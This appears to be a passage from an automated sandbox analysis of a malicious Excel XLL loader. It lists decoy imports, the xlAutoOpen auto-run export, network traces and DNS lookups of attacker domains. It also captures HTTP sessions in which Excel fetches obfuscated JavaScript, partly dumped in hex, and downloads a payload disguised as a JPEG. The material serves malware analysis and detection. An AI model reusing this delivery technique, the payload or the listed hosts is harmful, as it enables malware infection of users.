kernel32.dll  FindAtomA, SetFileApisToANSI, SetFileAttributesA, LockResource, lstrcmpiW, FreeEnvironmentStringsW, VirtualFree, SetMailslotInfo, EnumSystemLocalesA, ScrollConsoleScreenBufferA, GetConsoleCommandHistoryA, GlobalUnlock, GetSystemDirectoryW, FatalExit, _lopen, DisableThreadLibraryCalls, WaitForSingleObject, PostQueuedCompletionStatus, InvalidateConsoleDIBits, CreateDirectoryExA, lstrcmpA, LocalFlags, GetFileInformationByHandle, BeginUpdateResourceA, GetVDMCurrentDirectories, SetFileAttributesW, CreateSemaphoreW, ReadConsoleOutputAttribute
oleaut32.dll  VarR4FromDisp, CreateStdDispatch, VarDateFromUI8, OleSavePictureFile, VarI2FromDisp, VarR8FromUI2, SysStringLen, VarDecFromUI2, VarR4FromUI8, SafeArrayCopyData, LPSAFEARRAY_Marshal, DispGetIDsOfNames, SafeArrayGetLBound, VarBstrFromR8, VarI2FromDec, GetRecordInfoFromGuids, VarBstrFromUI1, VarUI2FromI2, VarTokenizeFormatString
tapi32.dll    lineCreateAgentSessionA, lineSetMediaControl, MMCGetAvailableProviders, lineNegotiateAPIVersion, lineDialA, lineDrop

This import set (the VB6 runtime, telephony functions from tapi32 and an assortment of kernel32 console, atom and resource calls) does not describe what the loader does. LoadLibraryW, GetProcAddress and ExpandEnvironmentStringsW, the names embedded in the entry-point preview, are absent, and the only memory-management import is VirtualFree. Treat the table as a decoy and take the real API surface from dynamic analysis.

Exports

Name        Ordinal  Address
xlAutoOpen  1        0xcd41903

xlAutoOpen is the callback Excel invokes when it loads an XLL add-in, so opening this file in Excel (and accepting the add-in prompt where one is shown) runs the loader without any macro being involved.

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jul 8, 2021 16:30:09.692430019 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.726878881 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.727005959 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.727418900 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:09.762516975 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811278105 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811317921 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811345100 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811362982 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811381102 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811399937 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.811415911 CEST  80           49724      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:09.812691927 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:10.367295027 CEST  49724        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.174525976 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.211349964 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.211483955 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.213911057 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.250462055 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378170967 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378241062 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378279924 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378309965 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378346920 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378382921 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378420115 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378422022 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378456116 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378460884 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378468990 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378492117 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.378510952 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.378530025 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.380610943 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.416707993 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.416785955 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.416913033 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.416939020 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417027950 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417084932 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417115927 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417136908 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417190075 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417205095 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417242050 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417292118 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417310953 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417345047 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417397022 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417412043 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417455912 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417510986 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417526960 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417582989 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417639017 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417658091 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.417694092 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.417766094 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.418477058 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.418606997 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.418632984 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.418648005 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.418725967 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.418761015 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.455653906 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455688000 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455710888 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455730915 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455754995 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455775976 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455796003 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455815077 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455837011 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455856085 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455873966 CEST  80           49748      8.211.241.0  192.168.2.3
Jul 8, 2021 16:30:58.455878973 CEST  49748        80         192.168.2.3  8.211.241.0
Jul 8, 2021 16:30:58.455892086 CEST  80           49748      8.211.241.0  192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455910921 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455919981 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455926895 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455929995 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455933094 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455948114 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455952883 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455969095 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455986023 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456007004 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456024885 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456027031 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456073046 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456084013 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456089020 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456115007 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456135988 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456156969 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456180096 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456223965 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456248045 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456253052 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456315041 CEST4974880192.168.2.38.211.241.0

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 8, 2021 16:29:53.564768076 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:29:53.578222990 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:29:54.178376913 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:29:54.192507982 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:29:54.824332952 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:29:54.838404894 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:29:55.835694075 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:29:55.848789930 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:29:56.741254091 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:29:56.755331039 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:29:57.480906010 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:29:57.497735023 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:29:59.299197912 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:29:59.313008070 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:00.503516912 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:00.516273975 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:01.344029903 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:01.356662989 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:08.551011086 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:08.612201929 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:08.898909092 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:08.937540054 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:09.381835938 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:09.690469027 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:09.912703991 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:09.927294016 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:13.134540081 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:13.147902012 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:14.911003113 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:14.924371958 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:15.634979010 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:15.648191929 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:16.993629932 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:17.006740093 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:18.653445959 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:18.667047024 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:19.314007044 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:19.327969074 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:21.062259912 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:21.078854084 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:21.765441895 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:21.778531075 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:21.855720043 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:21.870990038 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:30.737751961 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:30.759521961 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:49.591932058 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:49.628288031 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:52.060528994 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:52.076414108 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:55.887640953 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:55.906641960 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:30:57.862971067 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:30:58.155386925 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:31:27.690449953 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:31:27.718674898 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:31:41.349364996 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:31:41.383874893 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:31:44.151695967 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:31:44.173644066 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:31:52.775281906 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:31:52.788335085 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3
Jul 8, 2021 16:31:53.091214895 CEST | 63978 | 53 | 192.168.2.3 | 8.8.8.8
Jul 8, 2021 16:31:53.451231003 CEST | 53 | 63978 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 8, 2021 16:30:09.381835938 CEST | 192.168.2.3 | 8.8.8.8 | 0xdd4d | Standard query (0) | srand04rf.ru | A (IP address) | IN (0x0001)
Jul 8, 2021 16:30:57.862971067 CEST | 192.168.2.3 | 8.8.8.8 | 0x7e19 | Standard query (0) | srand04rf.ru | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.775281906 CEST | 192.168.2.3 | 8.8.8.8 | 0xdfcb | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:53.091214895 CEST | 192.168.2.3 | 8.8.8.8 | 0x6ae3 | Standard query (0) | sudepallon.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 8, 2021 16:30:09.690469027 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd4d | No error (0) | srand04rf.ru | | 8.211.241.0 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:30:58.155386925 CEST | 8.8.8.8 | 192.168.2.3 | 0x7e19 | No error (0) | srand04rf.ru | | 8.211.241.0 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | api.ipify.org | nagano-19599.herokussl.com | | CNAME (Canonical name) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.21.173.155 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.175.90 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.19.92.227 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.121.178 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.243.175.83 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.16.246.238 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.190.106 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:52.788335085 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfcb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.16.226.23 | A (IP address) | IN (0x0001)
Jul 8, 2021 16:31:53.451231003 CEST | 8.8.8.8 | 192.168.2.3 | 0x6ae3 | No error (0) | sudepallon.com | | 77.222.42.67 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• srand04rf.ru
• api.ipify.org
• sudepallon.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49724 | 8.211.241.0 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:30:09.727418900 CEST | 253 | OUT | GET /92375234.xml HTTP/1.1
    Connection: Keep-Alive
    Host: srand04rf.ru
Jul 8, 2021 16:30:09.811278105 CEST | 255 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 08 Jul 2021 14:30:09 GMT
    Content-Type: text/xml
    Content-Length: 8419
    Connection: keep-alive
    Last-Modified: Thu, 08 Jul 2021 14:19:40 GMT
    ETag: "60e7097c-20e3"
    Accept-Ranges: bytes
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 5f 30 78 38 63 38 36 20 3d 20 5b 0d 0a 20 20 20 20 27 57 36 52 63 55 48 48 4f 57 34 64 63 55 53 6f 63 79 5a 47 6a 27 2c 0d 0a 20 20 20 20 27 57 51 42 64 47 61 4f 37 57 50 71 5a 57 37 33 64 49 71 27 2c 0d 0a 20 20 20 20 27 57 34 70 63 4c 71 4b 67 79 43 6b 47 61 61 48 4a 57 36 4f 27 2c 0d 0a 20 20 20 20 27 57 34 68 63 4f 71 7a 42 6e 6d 6f 37 57 37 48 43 27 2c 0d 0a 20 20 20 20 27 62 57 46 63 56 57 6d 45 57 34 66 53 78 73 6c 64 55 53 6f 4b 57 50 57 27 2c 0d 0a 20 20 20 20 27 57 51 78 63 55 73 30 74 57 51 47 32 57 37 34 27 2c 0d 0a 20 20 20 20 27 79 66 43 31 57 36 42 63 50 65 66 37 57 36 6c 64 4a 64 75 27 2c 0d 0a 20 20 20 20 27 57 50 56 63 4a 53 6f 43 6e 48 79 75 57 52 4e 64 48 6d 6b 48 57 50 62 59 57 51 4b 27 2c 0d 0a 20 20 20 20 27 57 35 37 63 4b 43 6f 4b 69 43 6b 47 57 35 2f 63 50 5a 72 5a 6d 57 27 2c 0d 0a 20 20 20 20 27 57 51 78 64 48 78 7a 63 57 37 57 42 57 34 42 64 56 71 6e 76 57 50 6d 27 2c 0d 0a 20 20 20 20 27 57 35 4e 64 54 43 6b 6c 41 67 38 64 57 50 68 64 50 53 6b 30 57 52 39 4a 57 51 33 63 4c 53 6f 34 57 50 70 64 4e 32 4f 27 2c 0d 0a 20 20 20 20 27 7a 67 35 6a 57 37 30 2f 77 4a 31 65 57 34 6c 63 4f 4b 2f 63 48 47 27 2c 0d 0a 20 20 20 20 27 57 50 62 79 42 6d 6f 55 57 50 44 7a 6b 62 6c 63 4a 57 48 59 63 71 27 2c 0d 0a 20 20 20 20 27 57 37 6c 64 55 74 2f 63 4e 38 6b 64 57 50 4e 63 51 74 79 27 2c 0d 0a 20 20 20 20 27 61 61 68 64 48 75 54 48 57 50 39 44 71 47 27 2c 0d 0a 20 20 20 20 27 57 51 64 63 4d 62 69 38 
57 4f 53 78 57 37 71 27 2c 0d 0a 20 20 20 20 27 57 37 69 51 6e 6d 6f 2b 44 43 6b 56 7a 53 6f 63 27 2c 0d 0a 20 20 20 20 27 57 35 57 48 72 76 4a 63 54 6d 6f 46 45 77 2f 63 52 53 6f 6c 63 6d 6f 35 6d 6d 6f 49 27 2c 0d 0a 20 20 20 20 27 6b 38 6f 66 65 6d 6b 61 57 35 50 62 7a 63 7a 4c 6c 63 58 51 27 2c 0d 0a 20 20 20 20 27 57 37 68 64 55 4d 70 64 48 43 6f 38 57 35 46 63 4b 48 71 71 79 65 39 4d 27 2c 0d 0a 20 20 20 20 27 61 38 6f 70 63 53 6b 6f 6e 43 6b 4f 72 71 27 2c 0d 0a 20 20 20 20 27 57 50 62 35 57 51 56 64 56 30 68 63 51 53 6b 37 57 35 38 27 2c 0d 0a 20 20 20 20 27 79 31 44 4c 57 52 78 63 4b 65 31 6f 57 36 61 27 2c 0d 0a 20 20 20 20 27 57 35 33 63 4b 53 6f 50 6b 38 6f 50 57 35 64 63 4c 64 7a 75 69 43 6b 2b 27 2c 0d 0a 20 20 20 20 27 57 34 38 64 78 38 6b 4e 57 50 56 64 49 58 7a 65 69 53 6f 44 57 36 52 64 4d 6d 6b 34 57 4f 5a 63 47 6d 6b 71 67 64 37 64 4b 43 6b 2f 57 52 37 63 4c 53 6f 51 57 52 4c 36 57 34 58 52 65 65 33 64 4b 6d 6f 70 69 4c 33 63 4d 4a 6d 35 69 43 6b 67 57 36 37 63 4d 4c 75 78 57 37 33 63 4d 72 6c 64 4e 43 6b 76 43 66 5a 64 4b 43 6f 35 7a 6d 6f 6c 57 35 74 63 4a 76 64 63 49 53 6f 4c 57 36 4f 4e 57 37 37 64 53 38 6b 34 74 6d 6f 65 6a 43 6b 45 42 43 6b 2b 61 71 4b 72 57 37 43 34 57 52 78 63 48 53 6b 34 63 6d 6f 63 70 59 47 2f 6d 38 6b 69 64 75 30 61 74 47 72 4f 74 43 6f 79 57 34 2f 63 47 6d 6f 69 57 35 42 63 51 43 6f 66 67 53 6f 68 57 36 42 63 4d 4c 78 64 54 30 42 64 56 4b 61 32 46 53 6f 71 57 37 2f 63 4f 38 6f 31 6b 53 6b 51 57 34 76 4c
Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><script language="javascript">var _0x8c86 = [ 'W6RcUHHOW4dcUSocyZGj', 'WQBdGaO7WPqZW73dIq', 'W4pcLqKgyCkGaaHJW6O', 'W4hcOqzBnmo7W7HC', 'bWFcVWmEW4fSxsldUSoKWPW', 'WQxcUs0tWQG2W74', 'yfC1W6BcPef7W6ldJdu', 'WPVcJSoCnHyuWRNdHmkHWPbYWQK', 'W57cKCoKiCkGW5/cPZrZmW', 'WQxdHxzcW7WBW4BdVqnvWPm', 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O', 'zg5jW70/wJ1eW4lcOK/cHG', 'WPbyBmoUWPDzkblcJWHYcq', 'W7ldUt/cN8kdWPNcQty', 'aahdHuTHWP9DqG', 'WQdcMbi8WOSxW7q', 'W7iQnmo+DCkVzSoc', 'W5WHrvJcTmoFEw/cRSolcmo5mmoI', 'k8ofemkaW5PbzczLlcXQ', 'W7hdUMpdHCo8W5FcKHqqye9M', 'a8opcSkonCkOrq', 'WPb5WQVdV0hcQSk7W58', 'y1DLWRxcKe1oW6a', 'W53cKSoPk8oPW5dcLdzuiCk+', 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tmoejCkEBCk+aqKrW7C4WRxcHSk4cmocpYG/m8kidu0atGrOtCoyW4/cGmoiW5BcQCofgSohW6BcMLxdT0BdVKa2FSoqW7/cO8o1kSkQW4vL


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49748 | 8.211.241.0 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:30:58.213911057 CEST | 3578 | OUT | GET /08.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: srand04rf.ru
Connection: Keep-Alive
Jul 8, 2021 16:30:58.378170967 CEST | 3580 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Jul 2021 14:30:58 GMT
Content-Type: image/jpeg
Content-Length: 763392
Connection: keep-alive
Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT
ETag: "60e5ade0-ba600"
Accept-Ranges: bytes
